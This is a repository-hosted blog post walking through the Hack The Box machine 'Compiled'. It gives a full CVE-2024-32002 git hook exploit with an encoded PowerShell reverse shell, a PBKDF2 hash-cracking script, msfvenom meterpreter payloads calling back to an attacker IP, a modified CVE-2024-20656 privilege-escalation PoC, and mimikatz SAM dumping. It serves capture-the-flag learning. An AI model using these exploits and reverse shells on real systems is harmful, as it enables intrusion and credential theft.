mmckinnon/chirpy-starter
1
0
Fork 0
mirror of https://github.com/cotes2020/chirpy-starter.git synced 2025-04-21 11:53:27 +10:00
Code Issues Actions Packages Projects Releases Wiki Activity
chirpy-starter/_posts/2024-01-14-compiled.md
racc0x 6278b1b310 update-2025
2025-02-03 22:22:27 -06:00

262 lines
7.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
title: HTB - Compiled
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Compiled]
tags: [HackTheBox, CMS pluck, RCE, User-Agent]
image:
path: /assets/img/post/compiled/compiled-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Compiled.
---
## Box Info
| Name | Compiled |
| :-------------------- | ---------------: |
| Release Date | 20 Jul, 2024 |
| OS | Windows |
| Rated Difficulty | Medium |
## **Enumeration**
Information gathering
Nmap
![Image](/assets/img/post/compiled/image.png)
http://compiled.htb:5000
We have a web what does a git clone of a repository and decompress it and save the link of the repository (git).
![Image](/assets/img/post/compiled/image-1.png)
The repository calculator tells us a version of git that runs the web.
http://compiled.htb:3000/richard/Calculator
![Image](/assets/img/post/compiled/image-2.png)
## CVE-2024-32002
[Resource For Create The Exploit](https://amalmurali.me/posts/git-rce/)
![Image](/assets/img/post/compiled/image-3.png)
In few words we need to create 2 empty repository that match with the names the repository and add the payload useing the [Reverse Shell Generator](https://www.revshells.com/) , the names of repo can you rename as `repo1` and `repo2` or wathever you want, just match with the script.
`git clone --recursive git@github.com:amalmurali47/git_rce.git`
```zsh
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main
rm -rf nothing
rm -rf toSeeHere
git clone http://compiled.htb:3000/test/repo1.git
cd repo1
mkdir -p y/hooks
cat >y/hooks/post-checkout <<EOF
#!bin/sh.exe
powershell -e JABjAGw...
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..
git clone http://compiled.htb:3000/test/repo2.git
cd repo2
git submodule add --name x/y "http://compiled.htb:3000/test/repo1.git" A/modules/x
git commit -m "add-submodule"
printf ".git" >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m "add-symlink"
git push
```
![Image](/assets/img/post/compiled/image-4.png)
`rlwrap nc -lvnp 9001` listening and wait a get the `reverse shell` as `Richard`
![Image](/assets/img/post/compiled/image-5.png)
Download gitea.db for get the `Emily password`
![Image](/assets/img/post/compiled/image-6.png)
## Crack password
Sha-256
```
Password: 12345678 (bruh)
```
This script i made with chatGPT for crack the password
![Image](/assets/img/post/compiled/image-7.png)
#### Script
```python
import hashlib
import binascii
def pbkdf2_hash(password, salt, iterations=50000, dklen=50):
hash_value = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'),
salt,
iterations,
dklen
)
return hash_value
def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):
target_hash_bytes = binascii.unhexlify(target_hash)
with open(dictionary_file, 'r', encoding='utf-8') as file:
for line in file:
password = line.strip()
hash_value = pbkdf2_hash(password, salt, iterations, dklen)
if hash_value == target_hash_bytes:
print(f"Found password: {password}")
return password
print("Password not found.")
return None
salt = binascii.unhexlify('227d873cca89103cd83a976bdac52486')
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
dictionary_file = '/usr/share/wordlists/rockyou.txt'
find_matching_password(dictionary_file, target_hash, salt)
```
### Login as Emily
Evil-winrm for login as Emily :
`sudo evil-winrm -i compiled.htb -u Emily -p '12345678'`
![Image](/assets/img/post/compiled/image-8.png)
upload a payload.exe with msfvenom:
```zsh
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.16.45 lport=9001 -f exe -o payload.exe
```
msfconsole for exploit the payload, this is just for execute some commands bc in evil-winrm i can't the machine is finicky.
### Reconossaince Windows
```bash
PS>
- whoami /priv
- $Credential.GetNetworkCredential().password
- net user Emily
- tasklist
- Get-Service
Upload to winPEAS.exe and execute with powershell
PS>./winPEAS.exe
```
## Privilege Escalation
#### WinPEAS.exe
![Image](/assets/img/post/compiled/image-9.png)
Searching in google i found this
![Image](/assets/img/post/compiled/image-10.png)
## CVE-2024-20656
<https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/>
*NFS is a protocol that allows us to access files over a network in a manner similar to how we access local storage, and its commonly used to share files between UNIX/Linux and Windows systems.*
VSStandarCollectorService150 is a diagnostics tools, which is part of the visual studio, creates drectories and files in `"C:\Windows\Temp"`{: .filepath} directory with insufficiently restrivice permissions.
theres a github with a poc for CVE-2024-20656 but we need to make certain modification on the project, and then compile it to an executable.
[CVE-2024-20656](https://github.com/Wh04m1001/CVE-2024-20656/tree/main/Expl)
![Image](/assets/img/post/compiled/image-11.png)
### Visual Studio
The modification we make it is:
```js
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
```
![Image](/assets/img/post/compiled/image-12.png)
and below in the code called `void cb1()`
```js
CopyFile(L"c:\\users\\public\\payload2.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
```
Create a new payload with msfvenom for get the shell as Administrator.
```zsh
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.16.45 lport=9003 -f exe -o payload2.exe
```
You can put the paylaod/reverseShell there or make a path in `c:\windows\Temp`{: .filepath} and make a folder 'test' and inside upload a payload.exe for get shell as `NT/Authority System`
Create a new project using the Desktop Development C++ Kit and right click on 'Expl' Solution and then a box will appear with the add option and select the Existing Project.
tip: I missed hours why dont works the Expl.exe i found the "`Debug`" for compilated need to choose to "`Release`" for works the Expl.exe and get the reverse shell.
![Image](/assets/img/post/compiled/image-13.png)
Build Solution for compiling/building for get the ouput Expl.exe and upload via Evil-winrm
![Image](/assets/img/post/compiled/image-14.png)
For execute the Expl.exe we need to use RunasCs.exe via Evil-winrm but before to execute the expl.exe we go to generate a reverse shell with RunasCs.exe
```bash
./RunasCs.exe Emily 12345678 powershell.exe -r 10.10.16.45:9090
```
Instant we trying start the service "msiserivce".
```text
Shell with RunasCs.exe
PS>
net start msiservice
```
```text
Shell with Evil-winrm
PS>
./RunasCs.exe Emily 12345678 "C:\Users\Emily\Documents\Expl.exe"
```
With msfconsole listening get the shell as Administrator
![Image](/assets/img/post/compiled/image-15.png)
Rooted
We can upload mimikatz.exe for get the hash and login with evil-winrm
```bash
PS> mimikatz.exe
mimikatz#: lsadumo::sam
```
![Image](/assets/img/post/compiled/image-16.png)
![Image](/assets/img/post/compiled/image-17.png)
Reference in New Issue View Git Blame Copy Permalink